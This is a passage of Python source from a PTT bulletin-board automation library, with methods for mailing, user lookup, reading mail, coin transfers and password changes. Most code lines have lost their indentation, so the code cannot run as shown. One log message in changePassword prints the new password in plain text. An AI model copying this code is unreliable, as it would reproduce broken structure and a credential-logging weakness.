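    # Sends a PTT mail to UserID with MailTitle and MailContent, signed with signature file SignType.
    # The content is split into 20-line chunks that are pasted into the mail editor one page at a time.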
def mail(self, UserID, MailTitle, MailContent, SignType):
self.__IdleTime = 0
ConnectIndex = 0
if self.__isMailBoxFull:
self.__MailFullAPILock = True
self.Log('信箱已滿,已鎖定其他 API,請盡速清理信箱')
ErrCode = ErrorCode.Success
try:
UserID = str(UserID)
MailTitle = str(MailTitle)
MailContent = str(MailContent)
SignType = int(SignType)
except:
self.Log('輸入錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode
MailContentListTemp = MailContent.split('\r')
MailContentList = []
MailContentListIndex = 0
while len(MailContentListTemp) != 0:
if len(MailContentListTemp) >= 20:
MailContentList.append('\r'.join(MailContentListTemp[0:20]))
for i in range(20):
MailContentListTemp.pop(0)
else:
MailContentList.append('\r'.join(MailContentListTemp))
break
MailContentList.append('')
if self.__MailFullAPILock:
SendMessage = GotoMainMenuCommand + ' S\r' + UserID + '\r' + MailTitle + '\r'
else:
SendMessage = GotoMainMenuCommand + 'M\rS\r' + UserID + '\r' + MailTitle + '\r'
Refresh = True
isBreakDetect = False
        # List order determines detection priority
DetectTargetList = [
DetectUnit(
'編輯文章 ' + str(int((MailContentListIndex + 1) * 100 / len(MailContentList))) + ' %',
'編輯文章',
ResponseUnit(MailContentList[MailContentListIndex], True),
),
PTTBUGDetectUnit
]
self.__APILock[ConnectIndex].acquire()
while not isBreakDetect:
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=Refresh)
if ErrCode == ErrorCode.WaitTimeout:
self.Log('超時')
break
elif ErrCode != ErrorCode.Success:
self.Log('操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
isDetectedTarget = False
for i in range(len(DetectTargetList)):
if DetectTargetList[i].isMatch(self.__ReceiveData[ConnectIndex]):
self.Log(DetectTargetList[i].getDisplayMsg())
SendMessage = DetectTargetList[i].getResponse().getSendMessage()
Refresh = DetectTargetList[i].getResponse().needRefresh()
isDetectedTarget = True
if DetectTargetList[i].isBreakDetect():
isBreakDetect = True
ErrCode = DetectTargetList[i].getErrorCode()
if '編輯文章' in DetectTargetList[i].getDisplayMsg():
MailContentListIndex += 1
if MailContentListIndex == len(MailContentList):
isBreakDetect = True
break
DetectTargetList[i] = DetectUnit(
'編輯文章 ' + str(int((MailContentListIndex + 1) * 100 / len(MailContentList))) + ' %',
'編輯文章',
ResponseUnit('\r' + MailContentList[MailContentListIndex], True),
)
if not isDetectedTarget:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name + ' part 1', ConnectIndex=ConnectIndex)
self.Log('無法解析的狀態! PTT Library 緊急停止')
self.logout()
sys.exit()
if ErrCode != ErrorCode.Success:
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
SendMessage = '\x18'
Refresh = True
isBreakDetect = False
DetectTargetList = [
DetectUnit(
'任意鍵繼續',
'任意鍵',
ResponseUnit(GotoMainMenuCommand, False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
DetectUnit(
'儲存檔案',
'確定要儲存檔案嗎',
ResponseUnit('s\r', False),
),
DetectUnit(
'自存底稿',
'是否自存底稿',
ResponseUnit('y\r', True),
),
            # Choose a signature file
DetectUnit(
'選擇第 ' + str(SignType) + ' 簽名檔',
'選擇簽名檔',
ResponseUnit(str(SignType) + '\r', True),
),
DetectUnit(
'選擇第 ' + str(SignType) + ' 簽名檔',
'x=隨機',
ResponseUnit(str(SignType) + '\r', True),
),
DetectUnit(
'電子郵件選單',
'【電子郵件】',
ResponseUnit('\x1b\x4fD', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
DetectUnit(
'電子郵件選單',
'【主功能表】',
ResponseUnit('', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
PTTBUGDetectUnit
]
while not isBreakDetect:
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=Refresh)
if ErrCode == ErrorCode.WaitTimeout:
self.Log('超時')
break
elif ErrCode != ErrorCode.Success:
self.Log('操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
# self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
isDetectedTarget = False
for i in range(len(DetectTargetList)):
if DetectTargetList[i].isMatch(self.__ReceiveData[ConnectIndex]):
self.Log(DetectTargetList[i].getDisplayMsg())
SendMessage = DetectTargetList[i].getResponse().getSendMessage()
Refresh = DetectTargetList[i].getResponse().needRefresh()
isDetectedTarget = True
if DetectTargetList[i].isBreakDetect():
isBreakDetect = True
ErrCode = DetectTargetList[i].getErrorCode()
break
if not isDetectedTarget:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name + ' part 2', ConnectIndex=ConnectIndex)
self.Log('無法解析的狀態! PTT Library 緊急停止')
self.logout()
sys.exit()
self.__APILock[ConnectIndex].release()
self.__WaterBallProceeor()
self.__ErrorCode = ErrCode
return ErrCode
def getTime(self):
ConnectIndex = 0
result = None
if not self.__APICheck(sys._getframe().f_code.co_name):
return self.__ErrorCode, result
self.__APILock[ConnectIndex].acquire()
for i in range(3):
ErrCode, result = self.__getTime()
if ErrCode == ErrorCode.WaitTimeout or ErrCode == ErrorCode.Success:
break
self.__APILock[ConnectIndex].release()
self.__WaterBallProceeor()
self.__ErrorCode = ErrCode
return ErrCode, result
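    # Internal helper for getTime(): opens the main-menu clock screen and returns the time as 'HH:MM'.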
def __getTime(self):
self.__IdleTime = 0
ConnectIndex = 0
result = None
        # \x1b\x4fA is cursor Up; Down, Right, Left are B, C, D
SendMessage = GotoMainMenuCommand + 'P\x1b\x4fC\x1b\x4fD'
Refresh = True
isBreakDetect = False
        # List order determines detection priority
DetectTargetList = [
DetectUnit(
'',
'我是' + self.__ID,
ResponseUnit('', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
PTTBUGDetectUnit
]
while not isBreakDetect:
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=Refresh)
if ErrCode == ErrorCode.WaitTimeout:
self.Log('超時')
break
elif ErrCode != ErrorCode.Success:
self.Log('操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__ErrorCode = ErrCode
return ErrCode, result
# self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
isDetectedTarget = False
for DetectTarget in DetectTargetList:
if DetectTarget.isMatch(self.__ReceiveData[ConnectIndex]):
self.Log(DetectTarget.getDisplayMsg(), _LogLevel=LogLevel.DEBUG)
SendMessage = DetectTarget.getResponse().getSendMessage()
Refresh = DetectTarget.getResponse().needRefresh()
isDetectedTarget = True
if DetectTarget.isBreakDetect():
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
break
if not isDetectedTarget:
# self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
# self.Log('無法解析的狀態! PTT Library 緊急停止')
# sys.exit()
ErrCode = ErrorCode.ParseError
self.__ErrorCode = ErrCode
return ErrCode, result
if ErrCode != ErrorCode.Success:
self.__ErrorCode = ErrCode
return ErrCode, result
LastLine = self.__ReceiveData[ConnectIndex].split('\n').pop()
LastLineList = list(map(int, re.findall(r'\d+', LastLine)))
        if len(LastLineList) < 4:
ErrCode = ErrorCode.ParseError
self.__ErrorCode = ErrCode
return ErrCode, result
Hour = str(LastLineList[2])
Min = str(LastLineList[3])
if len(Hour) == 1:
Hour = '0' + Hour
if len(Min) == 1:
Min = '0' + Min
result = Hour + ':' + Min
ErrCode = ErrorCode.Success
self.__ErrorCode = ErrCode
return ErrCode, result
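    # Looks up UserID via the talk/query menu and parses the profile screen into a UserInformation object.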
def getUser(self, UserID):
self.__IdleTime = 0
ConnectIndex = 0
result = None
if not self.__APICheck(sys._getframe().f_code.co_name):
return self.__ErrorCode, result
try:
UserID = str(UserID)
except:
self.Log('輸入錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, result
self.__APILock[ConnectIndex].acquire()
SendMessage = '\x1b\x4fD\x1b\x4fD\x1b\x4fD\x1b\x4fDT\rQ\r' + UserID + '\r'
Refresh = True
isBreakDetect = False
        # List order determines detection priority
DetectTargetList = [
DetectUnit(
'取得使用者資料頁面',
'任意鍵',
ResponseUnit('', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
DetectUnit(
'查無該使用者',
'【聊天說話】',
ResponseUnit('', False),
BreakDetect=True,
ErrCode = ErrorCode.NoUser
),
PTTBUGDetectUnit
]
while not isBreakDetect:
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=Refresh)
if ErrCode == ErrorCode.WaitTimeout:
self.Log('超時')
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode, result
elif ErrCode != ErrorCode.Success:
self.Log('操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode, result
# self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
isDetectedTarget = False
for DetectTarget in DetectTargetList:
if DetectTarget.isMatch(self.__ReceiveData[ConnectIndex]):
self.Log(DetectTarget.getDisplayMsg(), _LogLevel=LogLevel.DEBUG)
SendMessage = DetectTarget.getResponse().getSendMessage()
Refresh = DetectTarget.getResponse().needRefresh()
isDetectedTarget = True
if DetectTarget.isBreakDetect():
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
break
if not isDetectedTarget:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
self.Log('無法解析的狀態! PTT Library 緊急停止')
self.logout()
sys.exit()
if ErrCode != ErrorCode.Success:
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode, result
UserPageList = self.__ReceiveData[ConnectIndex].split('\n')
# for i in range(len(UserPageList)):
# print('Q', UserPageList[i])
UserPage = '\n'.join(UserPageList[2:6])
# print(UserPage)
UserDataList = list(map(int, re.findall(r'\d+', UserPage)))
# print(UserDataList)
# print(len(UserDataList)) 19
LoginTime = UserDataList[0]
LegalPost = UserDataList[1]
IllegalPost = UserDataList[2]
LastIP = str(UserDataList[9]) + '.' + str(UserDataList[10]) + '.' + str(UserDataList[11]) + '.' + str(UserDataList[12])
FiveChess = UserDataList[13:16]
Chess = UserDataList[16:19]
ID = UserPageList[1]
ID = ID[ID.find('《ID暱稱》') + len('《ID暱稱》') : ID.find('《經濟狀況》')]
while ID.startswith(' '):
ID = ID[1:]
while ID.endswith(' '):
ID = ID[:-1]
Money = UserPageList[1]
Money = Money[Money.find('《經濟狀況》') + len('《經濟狀況》') :]
while Money.startswith(' '):
Money = Money[1:]
while Money.endswith(' '):
Money = Money[:-1]
State = UserPageList[3]
State = State[State.find('《目前動態》') + len('《目前動態》') : State.find('《私人信箱》')]
while State.startswith(' '):
State = State[1:]
while State.endswith(' '):
State = State[:-1]
Mail = UserPageList[3]
Mail = Mail[Mail.find('《私人信箱》') + len('《私人信箱》') :]
while Mail.startswith(' '):
Mail = Mail[1:]
while Mail.endswith(' '):
Mail = Mail[:-1]
LastLogin = UserPageList[4]
LastLogin = LastLogin[LastLogin.find('《上次上站》') + len('《上次上站》') : LastLogin.find('《上次故鄉》')]
while LastLogin.startswith(' '):
LastLogin = LastLogin[1:]
while LastLogin.endswith(' '):
LastLogin = LastLogin[:-1]
# print('ID:', ID)
# print('Money:', Money)
# print('State:', State)
# print('Mail:', Mail)
# print('LastLogin:', LastLogin)
# print('LoginTime:', LoginTime)
# print('LegalPost:', LegalPost)
# print('IllegalPost:', IllegalPost)
# print('LastIP:', LastIP)
# print('FiveChess:', FiveChess)
# print('Chess:', Chess)
result = Information.UserInformation(ID, Money, LoginTime, LegalPost, IllegalPost, State, Mail, LastLogin, LastIP, FiveChess, Chess)
self.__APILock[ConnectIndex].release()
self.__WaterBallProceeor()
ErrCode = ErrorCode.Success
self.__ErrorCode = ErrCode
return ErrCode, result
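    # Returns the newest index: the newest mail number when Board is empty, otherwise the newest post
    # index of Board (optionally narrowed by SearchType and Search).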
def getNewestIndex(self, Board='', SearchType=0, Search=''):
self.__IdleTime = 0
ConnectIndex = 0
result = 0
try:
Board = str(Board)
SearchType = int(SearchType)
Search = str(Search)
except:
self.Log('輸入錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, result
if SearchType < PostSearchType.MinValue or PostSearchType.MaxValue < SearchType:
self.Log('搜尋類型輸入錯誤: 無法判別搜尋類型 搜尋條件失效', LogLevel.WARNING)
Search = ''
SearchType = PostSearchType.Unknow
if (Search != '' and SearchType == PostSearchType.Unknow) or (Search == '' and SearchType != PostSearchType.Unknow):
self.Log('無法判別搜尋類型 搜尋條件失效', LogLevel.WARNING)
Search = ''
if Board == '' and Search != '':
self.Log('郵件模式下無法使用搜尋條件', LogLevel.WARNING)
Search = ''
if SearchType == PostSearchType.Keyword:
pass
elif SearchType == PostSearchType.Author:
pass
elif SearchType == PostSearchType.Push:
if not Search.isdigit():
self.Log('搜尋條件輸入錯誤: 搜尋推文數 但搜尋條件非數字 搜尋條件失效', LogLevel.WARNING)
Search = ''
SearchType = PostSearchType.Unknow
elif SearchType == PostSearchType.Mark:
if Search != 'm' and Search != 's':
self.Log('搜尋條件輸入錯誤: 搜尋標記 但搜尋條件非 m 或 s 搜尋條件失效', LogLevel.WARNING)
Search = ''
SearchType = PostSearchType.Unknow
elif SearchType == PostSearchType.Money:
if not Search.isdigit():
self.Log('搜尋條件輸入錯誤: 搜尋稿酬 但搜尋條件非數字 搜尋條件失效', LogLevel.WARNING)
Search = ''
SearchType = PostSearchType.Unknow
self.__APILock[ConnectIndex].acquire()
if Board == '':
SendMessage = GotoMainMenuCommand + ' \x1aM0\r$'
Refresh = True
isBreakDetect = False
            # List order determines detection priority
DetectTargetList = [
DetectUnit(
'進入信箱',
'郵件選單',
ResponseUnit('', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
#
PTTBUGDetectUnit
]
while not isBreakDetect:
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=Refresh)
if ErrCode == ErrorCode.WaitTimeout:
self.Log('超時')
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode, result
elif ErrCode != ErrorCode.Success:
self.Log('操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode, result
# self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
isDetectedTarget = False
for DetectTarget in DetectTargetList:
if DetectTarget.isMatch(self.__ReceiveData[ConnectIndex]):
self.Log(DetectTarget.getDisplayMsg(), _LogLevel=LogLevel.DEBUG)
SendMessage = DetectTarget.getResponse().getSendMessage()
Refresh = DetectTarget.getResponse().needRefresh()
isDetectedTarget = True
if DetectTarget.isBreakDetect():
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
break
if not isDetectedTarget:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
self.Log('無法解析的狀態! PTT Library 緊急停止')
self.logout()
sys.exit()
if ErrCode != ErrorCode.Success:
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode, result
MailBoxLineList = self.__ReceiveData[ConnectIndex].split('\n')
# for i in range(len(MailBoxLineList)):
# print('line', i,MailBoxLineList[i])
result = list(map(int, re.findall(r'\d+', MailBoxLineList[3])))[0]
else:
if not self.__APICheck(sys._getframe().f_code.co_name):
self.__APILock[ConnectIndex].release()
return self.__ErrorCode, result
for i in range(3):
ErrCode, result = self.__getNewestPostIndex(Board=Board, SearchType=SearchType, Search=Search)
if ErrCode == ErrorCode.Success:
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode, result
self.__APILock[ConnectIndex].release()
self.__WaterBallProceeor()
ErrCode = ErrorCode.Success
self.__ErrorCode = ErrCode
return ErrCode, result
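    # Reads mail number MailIndex page by page and returns a MailInformation object
    # (author, title, date, content, sender IP and the raw terminal bytes).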
def getMail(self, MailIndex):
self.__IdleTime = 0
ConnectIndex = 0
result = None
        # This API is not affected by the mailbox-full API lock
try:
MailIndex = int(MailIndex)
except:
self.Log('輸入錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, result
if MailIndex <= 0:
self.Log('錯誤的輸入: ' + str(MailIndex))
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, result
ErrCode, NewestMailIndex = self.getNewestIndex()
if ErrCode != ErrorCode.Success:
self.Log('取得最新信箱編號失敗: ' + str(ErrCode))
self.__ErrorCode = ErrCode
return ErrCode, result
if MailIndex > NewestMailIndex:
self.Log('錯誤的輸入: ' + str(MailIndex))
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode, result
if NewestMailIndex == 0:
self.Log('信箱中沒有郵件')
ErrCode = ErrorCode.Success
self.__ErrorCode = ErrCode
return ErrCode, result
else:
self.Log('信箱中最新郵件編號: ' + str(NewestMailIndex), LogLevel.DEBUG)
self.__APILock[ConnectIndex].acquire()
SendMessage = str(MailIndex) + '\r\r'
Refresh = True
isBreakDetect = False
        # List order determines detection priority
DetectTargetList = [
DetectUnit(
'讀取信件完畢',
'(100%) 目前顯示: 第',
ResponseUnit('', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
DetectUnit(
'',
'目前顯示',
ResponseUnit('', False),
),
PTTBUGDetectUnit
]
FirstPage = ''
PageIndex = 2
LastPageIndex = 0
MailContentList = []
MailRawContentList = []
isFirstPage = True
NewLine, _ = uao.encode('\n')
NewLineByte = NewLine[0]
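        # Page through the mail. Consecutive screens overlap, so the line range shown at the bottom of
        # each page is used to drop the lines that were already collected from the previous page.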
while not isBreakDetect:
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=Refresh)
if ErrCode == ErrorCode.WaitTimeout:
self.Log('超時')
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode, result
elif ErrCode != ErrorCode.Success:
self.Log('操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode, result
# self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
isDetectedTarget = False
if FirstPage == '':
FirstPage = self.__ReceiveData[ConnectIndex]
for DetectTarget in DetectTargetList:
if DetectTarget.isMatch(self.__ReceiveData[ConnectIndex]):
self.Log(DetectTarget.getDisplayMsg(), _LogLevel=LogLevel.DEBUG)
# self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
CurrentPage = self.__ReceiveData[ConnectIndex]
CurrentRawPage = list(self.__ReceiveRawData[ConnectIndex])
CurrentPageList = CurrentPage.split('\n')
PageLineRange = CurrentPageList.pop()
# CurrentRawPage.pop()
LastIndex = 0
for i in range(len(CurrentRawPage)):
if CurrentRawPage[i] == NewLineByte:
LastIndex = i
if LastIndex != 0:
CurrentRawPage = CurrentRawPage[:LastIndex]
PageLineRangeTemp = re.findall(r'\d+', PageLineRange)
PageLineRangeTemp = list(map(int, PageLineRangeTemp))[-2:]
OverlapLine = LastPageIndex - PageLineRangeTemp[0] + 1
                    # Handle the line-count error caused by separator lines
# if PageLineRangeTemp[0] > 1 and PageLineRangeTemp[0] < 5:
# OverlapLine += 1
if OverlapLine >= 1 and LastPageIndex != 0:
# print('重疊', OverlapLine, '行')
CurrentPageList = CurrentPageList[OverlapLine:]
if not isFirstPage:
for i in range(OverlapLine):
for ii in range(len(CurrentRawPage)):
if CurrentRawPage[ii] == NewLineByte:
CurrentRawPage = CurrentRawPage[ii + 1:]
break
LastPageIndex = PageLineRangeTemp[1]
MailContentList.extend(CurrentPageList)
if not isFirstPage:
MailRawContentList.extend([NewLineByte])
MailRawContentList.extend(CurrentRawPage)
isDetectedTarget = True
if DetectTarget.isBreakDetect():
IPLine = CurrentPageList.pop()
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
break
SendMessage = str(PageIndex) + '\r'
Refresh = True
isFirstPage = False
PageIndex += 1
if not isDetectedTarget:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
self.Log('無法解析的狀態! PTT Library 緊急停止')
self.logout()
sys.exit()
if ErrCode != ErrorCode.Success:
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode, result
MailLineList = FirstPage.split('\n')
Target = '作者 '
if Target in FirstPage:
MailAuthor = MailLineList[0]
MailAuthor = MailAuthor[MailAuthor.find(Target) + len(Target):]
MailAuthor = MailAuthor[:MailAuthor.find('\r')]
MailAuthor = MailAuthor.rstrip()
else:
MailAuthor = None
Target = '標題 '
if Target in FirstPage:
MailTitle = MailLineList[1]
MailTitle = MailTitle[MailTitle.find(Target) + len(Target):]
MailTitle = MailTitle[:MailTitle.find('\r')]
MailTitle = MailTitle.rstrip()
else:
MailTitle = None
Target = '時間 '
if Target in FirstPage:
MailDate = MailLineList[2]
MailDate = MailDate[MailDate.find(Target) + len(Target):]
MailDate = MailDate[:MailDate.find('\r')]
MailDate = MailDate.rstrip()
else:
MailDate = None
# self.Log('MailAuthor: =' + MailAuthor + '=', LogLevel.DEBUG)
# self.Log('MailTitle: =' + MailTitle + '=', LogLevel.DEBUG)
# self.Log('MailDate: =' + MailDate + '=', LogLevel.DEBUG)
MailIP = None
for line in MailContentList:
# print('! ' + line)
if '※ 發信站: 批踢踢實業坊(ptt.cc), 來自' in line:
IPCheck = re.search("\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", line)
if IPCheck != None:
MailIP = IPCheck.group()
MailContent = '\n'.join(MailContentList)
MailRawContent = MailRawContentList
# self.Log('MailContent: =' + MailContent + '=', LogLevel.DEBUG)
# if len(IPLine) < 7:
# # 如果只有一頁的情況,IP 會顯示在第一頁
# IPLine = MailLineList.pop()
# IPLine = IPLine[:IPLine.find('瀏覽')]
# MailIPList = list(map(str, re.findall(r'\d+', IPLine)))
# MailIP = '.'.join(MailIPList)
# self.Log('MailIP: =' + MailIP + '=', LogLevel.DEBUG)
result = Information.MailInformation(MailAuthor, MailTitle, MailDate, MailContent, MailIP, MailRawContent)
self.__APILock[ConnectIndex].release()
self.__WaterBallProceeor()
ErrCode = ErrorCode.Success
self.__ErrorCode = ErrCode
return ErrCode, result
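    # Transfers Money PTT coins to user ID; YourPassword is required to confirm the transaction.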
def giveMoney(self, ID, Money, YourPassword):
self.__IdleTime = 0
ConnectIndex = 0
if not self.__APICheck(sys._getframe().f_code.co_name):
return self.__ErrorCode
try:
ID = str(ID)
Money = int(Money)
YourPassword = str(YourPassword)
except:
self.Log('輸入錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode
self.__APILock[ConnectIndex].acquire()
        # Move to the main menu
SendMessage = '\x1b\x4fD\x1b\x4fD\x1b\x4fD\x1b\x4fD'
        # Move to the P-coin transfer screen
SendMessage += 'P\rP\rO\r'
Refresh = True
isBreakDetect = False
        # List order determines detection priority
DetectTargetList = [
#
DetectUnit(
'P 幣不足',
'你沒有那麼多Ptt幣喔!',
ResponseUnit('', False),
BreakDetect=True,
ErrCode = ErrorCode.NoEnoughP
),
DetectUnit(
'輸入幸運兒帳號',
'這位幸運兒的id',
ResponseUnit(ID + '\r', False),
),
DetectUnit(
'輸入金額',
'要給他多少Ptt幣呢?',
ResponseUnit('\t' + str(Money) + '\r', False),
),
DetectUnit(
'無需密碼',
'認證尚未過期',
ResponseUnit('y\r', False),
),
DetectUnit(
'確認身分',
'完成交易前要重新確認您的身份',
ResponseUnit(YourPassword + '\r', False),
),
DetectUnit(
'等待交易進行中',
'交易正在進行中',
ResponseUnit('', False),
),
DetectUnit(
'',
'要修改紅包袋嗎?',
ResponseUnit('\r', False),
),
DetectUnit(
'交易成功',
'按任意鍵繼續',
ResponseUnit('\x1b\x4fD\x1b\x4fD\x1b\x4fD\x1b\x4fD', False),
),
DetectUnit(
'',
'主功能表',
ResponseUnit('', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
PTTBUGDetectUnit
]
while not isBreakDetect:
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=Refresh)
if ErrCode == ErrorCode.WaitTimeout:
                self.Log('操作超時重新嘗試')
break
elif ErrCode != ErrorCode.Success:
                self.Log('操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
isDetectedTarget = False
for DetectTarget in DetectTargetList:
if DetectTarget.isMatch(self.__ReceiveData[ConnectIndex]):
self.Log(DetectTarget.getDisplayMsg())
SendMessage = DetectTarget.getResponse().getSendMessage()
Refresh = DetectTarget.getResponse().needRefresh()
isDetectedTarget = True
if DetectTarget.isBreakDetect():
self.__isConnected[ConnectIndex] = True
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
break
if not isDetectedTarget:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
self.Log('無法解析的狀態! PTT Library 緊急停止')
self.logout()
sys.exit()
self.__APILock[ConnectIndex].release()
self.__WaterBallProceeor()
self.__ErrorCode = ErrCode
return ErrCode
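    # Changes the account password from OldPassword to NewPassword.
    # PTT keeps only the first eight characters, so longer passwords are truncated here first.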
def changePassword(self, OldPassword, NewPassword):
self.__IdleTime = 0
ConnectIndex = 0
ErrCode = ErrorCode.Success
if not self.__APICheck(sys._getframe().f_code.co_name):
return self.__ErrorCode
try:
OldPassword = str(OldPassword)
NewPassword = str(NewPassword)
except:
self.Log('輸入錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode
if len(NewPassword) > 8:
self.Log('新密碼超過八位後將被系統省略', LogLevel.WARNING)
while len(NewPassword) > 8:
NewPassword = NewPassword[:-1]
self.__APILock[ConnectIndex].acquire()
        # Move to the main menu
SendMessage = '\x1b\x4fD\x1b\x4fD\x1b\x4fD\x1b\x4fD'
        # Move to the password-change screen
SendMessage += 'U\rI\r2\r'
Refresh = True
isBreakDetect = False
        # List order determines detection priority
DetectTargetList = [
DetectUnit(
'輸入舊密碼',
'請輸入原密碼',
ResponseUnit(OldPassword + '\r', False),
LogLV = LogLevel.DEBUG,
),
DetectUnit(
'輸入新密碼',
'請設定新密碼',
ResponseUnit(NewPassword + '\r', False),
LogLV = LogLevel.DEBUG,
),
DetectUnit(
'確認新密碼',
'請檢查新密碼',
ResponseUnit(NewPassword + '\r', False),
LogLV = LogLevel.DEBUG,
),
DetectUnit(
'確認',
'您確定(Y/N)',
ResponseUnit('y\r', True),
LogLV = LogLevel.DEBUG,
),
DetectUnit(
'注意!您已將舊密碼更換為新密碼(' + NewPassword + ')',
'我是' + self.__ID,
ResponseUnit('\x1b\x4fD\x1b\x4fD\x1b\x4fD\x1b\x4fD', False),
),
DetectUnit(
'密碼不正確',
'您輸入的密碼不正確',
ResponseUnit('y\r', True),
BreakDetect=True,
ErrCode = ErrorCode.WrongPassword
),
DetectUnit(
'',
'主功能表',
ResponseUnit('', False),
BreakDetect=True,
ErrCode = ErrorCode.Success
),
PTTBUGDetectUnit
]
while not isBreakDetect:
ErrCode, CatchIndex = self.__operatePTT(ConnectIndex, SendMessage=SendMessage, Refresh=Refresh)
if ErrCode == ErrorCode.WaitTimeout:
self.Log('操作超時重新嘗試')
break
elif ErrCode != ErrorCode.Success:
                self.Log('操作失敗 錯誤碼: ' + str(ErrCode), LogLevel.DEBUG)
self.__APILock[ConnectIndex].release()
self.__ErrorCode = ErrCode
return ErrCode
isDetectedTarget = False
for DetectTarget in DetectTargetList:
if DetectTarget.isMatch(self.__ReceiveData[ConnectIndex]):
self.Log(DetectTarget.getDisplayMsg(), DetectTarget.getLogLevel())
SendMessage = DetectTarget.getResponse().getSendMessage()
Refresh = DetectTarget.getResponse().needRefresh()
isDetectedTarget = True
if DetectTarget.isBreakDetect():
self.__isConnected[ConnectIndex] = True
isBreakDetect = True
ErrCode = DetectTarget.getErrorCode()
break
break
if not isDetectedTarget:
self.__showScreen(ErrCode, sys._getframe().f_code.co_name, ConnectIndex=ConnectIndex)
self.Log('無法解析的狀態! PTT Library 緊急停止')
self.logout()
sys.exit()
self.__APILock[ConnectIndex].release()
self.__WaterBallProceeor()
self.__ErrorCode = ErrCode
return ErrCode
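    # Replies to a post on Board, located by PostID or Index; ReplyType selects a board reply,
    # a mail reply, or both.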
def replyPost(self, Board, Content, ReplyType, PostID='', Index=-1):
self.__IdleTime = 0
ConnectIndex = 0
ErrCode = ErrorCode.Success
if not self.__APICheck(sys._getframe().f_code.co_name):
return self.__ErrorCode
try:
Board = str(Board)
Content = str(Content)
ReplyType = int(ReplyType)
PostID = str(PostID)
Index = int(Index)
except:
self.Log('輸入錯誤', LogLevel.WARNING)
ErrCode = ErrorCode.ErrorInput
self.__ErrorCode = ErrCode
return ErrCode
ReplyResponse = ''
if ReplyType == ReplyPostType.Board:
ReplyResponse = 'F'
